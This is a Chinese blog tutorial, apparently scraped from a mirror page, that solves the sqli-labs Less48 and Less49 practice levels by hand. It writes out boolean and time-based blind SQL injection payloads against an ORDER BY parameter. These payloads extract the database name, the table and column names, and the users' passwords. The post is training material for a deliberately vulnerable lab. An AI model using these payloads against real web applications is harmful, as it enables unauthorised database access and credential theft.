当前位置:网站首页>(手工)【sqli-labs48、49】order by注入、盲注、GET注入
(手工)【sqli-labs48、49】order by注入、盲注、GET注入
2022-07-16 15:13:00 【黑色地带(崛起)】
目录
三、Less48(GET-Error based -Blind - Numeric - ORDER BY CLAUSE)
四、Less49(GET-Error based - String - Blind ORDER BY CLAUSE)
一、推荐:
【SQL注入】堆叠注入https://blog.csdn.net/qq_53079406/article/details/125798787?spm=1001.2014.3001.5501https://blog.csdn.net/qq_53079406/article/details/125798787?spm=1001.2014.3001.5501
https://blog.csdn.net/qq_53079406/article/details/125798787?spm=1001.2014.3001.5501【SQL注入】数字型注入 & 字符型注入https://blog.csdn.net/qq_53079406/article/details/125741101?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165786402616781435435338%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=165786402616781435435338&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~rank_v31_ecpm-1-125741101-null-null.185%5Ev2%5Econtrol&utm_term=%E6%95%B0%E5%AD%97%E5%9E%8B&spm=1018.2226.3001.4450https://blog.csdn.net/qq_53079406/article/details/125741101?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165786402616781435435338%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=165786402616781435435338&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~rank_v31_ecpm-1-125741101-null-null.185%5Ev2%5Econtrol&utm_term=%E6%95%B0%E5%AD%97%E5%9E%8B&spm=1018.2226.3001.4450
【SQL注入-无回显】布尔盲注:原理、函数、利用过程https://blog.csdn.net/qq_53079406/article/details/125275974?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165786796416782248562911%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=165786796416782248562911&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~rank_v31_ecpm-5-125275974-null-null.185%5Ev2%5Econtrol&utm_term=%E7%9B%B2%E6%B3%A8&spm=1018.2226.3001.4450https://blog.csdn.net/qq_53079406/article/details/125275974?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165786796416782248562911%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=165786796416782248562911&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~rank_v31_ecpm-5-125275974-null-null.185%5Ev2%5Econtrol&utm_term=%E7%9B%B2%E6%B3%A8&spm=1018.2226.3001.4450
https://blog.csdn.net/qq_53079406/article/details/125815205?spm=1001.2014.3001.5501二、(手工)SQL注入基本步骤:
第一步:注入点测试
第二步:分析权限
第三步:判断字段数
第四步:爆数据库名
第五步:爆表名
第六步:爆字段名
第七步:爆数据
三、Less48(GET-Error based -Blind - Numeric - ORDER BY CLAUSE)
3.1、简介:(order by注入-盲注-GET注入)
请求方法:GET
方法:order by注入+盲注+数字型注入
3.1、第一步:注入点测试
按照提示输入?sort=1
输入'
页面不正常,说明存在注入点
没有报错,可以采取盲注(布尔盲注、时间盲注)
?sort=rand(true)
?sort=rand(false)
可以采取布尔盲注
3.3、第二步:分析过滤
方法一:
考虑一步一步将注入语句字符一个一个替换掉,直到不报错(浪费时间)
或者全部替换(如果报错,不知道哪里被过滤了)
方法二:
获取源码进行白盒审计(最优)
3.4、第三步:判断字段数/回显位
?sort=3
回显正常
?sort=4
报错
说明有3个字段
3.5、第四步:暴库
?sort=rand(left(database(),1)>'s')
得到的结果与rand(false)相同
说明这个条件错误
最后推出
?sort=rand(left(database(),1)='s')
与rand(true)结果相同
说明条件正确
得到第一个字符是s
以此类推得到security
(通过改变判断的位置)
或者(时间盲注)
?sort=1 and if(substr(database(),1,1)='s',sleep(5),0)
3.6、第五步:爆表名
?sort=rand(left((select group_concat(table_name) from information_schema.tables where table_schema=database()),1)>'e')
得到的结果与rand(false)相同
说明这个条件错误
?sort=rand(left((select group_concat(table_name) from information_schema.tables where table_schema=database()),1)='e')
与rand(ture)返回相同
说明条件正确
分别挨个推出表
emails referers uagents users
或者(时间盲注)
?sort=1 and if(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)='e',sleep(5),0)
3.7、第六步:爆字段
?sort=rand(left((select group_concat(column_name) from information_schema.columns where table_name='users'),1)>'u')
得到的结果与rand(false)相同
说明这个条件错误
?sort=rand(left((select group_concat(column_name) from information_schema.columns where table_name='users'),1)='u')
与rand(ture)返回相同
说明条件正确
依此类推得到字段
或者(时间盲注)
?sort=1 and if(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1)='u',sleep(5),0)
3.9、第八步:爆数据
?sort=rand(left((select group_concat(password) from security.users),1)>'1')
得到的结果与rand(false)相同
说明这个条件错误
?sort=rand(left((select group_concat(password) from security.users),1)='1')
与rand(ture)返回相同
说明条件正确
或者(时间盲注)
?sort=1 and if(substr((select group_concat(username,password) from security.users limit 0,1),1,1)='d',sleep(5),0)
四、Less49(GET-Error based - String - Blind ORDER BY CLAUSE)
4.1、简介:(order by注入-盲注-GET注入)
请求方法:GET
方法:order by注入+盲注+字符型注入
4.2、利用:
与Less48相比
需要闭合'
边栏推荐
猜你喜欢
微机总线地址,物理地址,虚拟地址(详细介绍)
【Day4】optimization
HCIP(4)
第七次笔记:程序的机器级代码表示
Excel finds characters from the right and intercepts them
10 suggestions for graduating and going to the programmer's Road (wonderful pictures)
Leetcode 1331. Array sequence number conversion
基于Web的爬虫系统设计与实现
Summary of the method of distinguishing version number for fastjson deserialization vulnerability
LeetCode高频题:图像交并比IoU计算方法和手撕代码
随机推荐
Extraction-01-fixed extraction technology for template and generic programming
Tree array
2022 New Year blessing code interpretation (1)
IDEA 创建新分支,合并代码(其它->dev)
HCIP(7)
如何描述变量:存储类、生命周期,作用域、链接属性
图的广度优先遍历
《痞子衡嵌入式半月刊》 第 58 期
STM32 interrupt priority management NVIC details
指针的理解与操作
HCIP(4)
基于Web的爬虫系统设计与实现
Docker配置mysql以及宿主机容器目录挂载
【Day4】optimization
【C语言刷LeetCode】676. 实现一个魔法字典(M)
Solution of eigenvalue and eigenvector
Leetcode 1331. 数组序号转换
2022新年祝福代码诠释(1)
Explanation of coordinate conversion examples
02-回顾多线程